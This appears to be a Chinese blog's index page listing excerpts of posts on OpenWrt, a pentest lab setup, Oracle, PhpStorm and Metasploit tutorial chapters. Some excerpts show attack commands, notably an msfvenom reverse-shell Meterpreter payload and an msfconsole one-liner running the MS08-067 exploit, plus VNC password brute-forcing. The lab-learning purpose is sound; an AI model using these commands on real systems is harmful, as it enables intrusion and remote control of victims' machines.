摘要: openwrt锐捷认证无法跳转 关闭重绑定保护 阅读全文
posted @ 2021-10-05 10:27 adsry 阅读(104) 评论(0) 推荐(0) 编辑
摘要: 红日靶场一 一:环境搭建 1、下载好镜像文件。 2、直接vmware启动即可。 这里我用自己的win10虚拟机作为攻击机,设置为双网卡NAT,vm2(192.168.234.131) 设置win7为双网卡,vm1(192.168.52.143),vm2(192.168.234.130) 设置win0 阅读全文
posted @ 2021-07-21 14:37 adsry 阅读(6997) 评论(0) 推荐(1) 编辑
摘要: 数据库系统概念书中数据,oracle导入 前言 最近在学习数据库系统概念时老师让我们装一个小的oracle数据库,老师想让我们直接装一个虚拟机,然后用toad来远程连接本地的数据库,大小有20多G,嫌弃太大了,一个这么小的数据库用20多g,然后觉得toad不好用,所有就打算自己来windows建一个 阅读全文
posted @ 2021-03-31 23:28 adsry 阅读(98) 评论(0) 推荐(0) 编辑
摘要: phpstorm折腾 激活:https://blog.csdn.net/nima1994/article/details/78988595 学生激活,用edu邮箱即可,如果一年有效期过去了,直接在邮箱会有提醒续期 下载 配置: 创建项目运行: 下载: phpstorm下载 phpstudy下载 配置 阅读全文
posted @ 2021-02-02 19:03 adsry 阅读(163) 评论(0) 推荐(0) 编辑
摘要: 零组云函数签到 一:腾讯云函数签到 前言:0组公众号发布了一个文库的自动签到脚本 https://github.com/0-Xyao/Zero-box/blob/main/%E6%96%87%E5%BA%93%E7%AD%BE%E5%88%B0%E8%84%9A%E6%9C%AC/auto-chec 阅读全文
posted @ 2021-02-02 19:02 adsry 阅读(691) 评论(0) 推荐(0) 编辑
摘要: 十四:社会工程学 无论什么软件都有可能存在漏洞 1:基于人的社会工程学可以看一看欺骗的艺术和入侵的艺术 2:基于机器的社会工程学 root@kali:~# setoolkit 选项软件 { 最好不要用4,5可能会与kali冲突 6 help,2是用来exploit,没必要去用了,msf就可以了 } 阅读全文
posted @ 2020-05-22 15:13 adsry 阅读(222) 评论(0) 推荐(0) 编辑
摘要: 十二:后渗透阶段 提权,信息收集,渗透内网,永久后门 1:基于已有的session扩大战果 root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LP 阅读全文
posted @ 2020-05-22 12:23 adsry 阅读(1158) 评论(0) 推荐(0) 编辑
摘要: 十:客户端渗透 社会工程学,进而渗透线上业务网络 含有漏洞利用代码的web站点 含有漏洞利用代码的doc,pdf等文档 诱骗被害者执行payload 1:诱骗被害者执行payload(windows) 可以自己学习 这个我没有环境,没办法了,可以去学习下msfvenom 2:诱骗被害者执行paylo 阅读全文
posted @ 2020-05-22 11:46 adsry 阅读(515) 评论(0) 推荐(0) 编辑
摘要: 九:弱点扫描 根据信息手机结果搜索漏洞利用模块 结合外部漏洞扫描系统对大IP地址段进行批量扫描 1:VNC (1)密码破解 msf5 > use auxiliary/scanner/vnc/vnc_login msf5 auxiliary(scanner/vnc/vnc_login) > show 阅读全文
posted @ 2020-05-22 11:31 adsry 阅读(563) 评论(0) 推荐(0) 编辑
摘要: 八:Msfcil(命令行界面,已被取消) 由msfconsole -x取代 编写脚本时便于引用 eg:(一行表示,更方便) msfconsole -x “use exploit/windows/smb/ms08_067_netapi;set rhost 1.1.1.1; set payload wi 阅读全文
posted @ 2020-05-22 11:16 adsry 阅读(483) 评论(0) 推荐(0) 编辑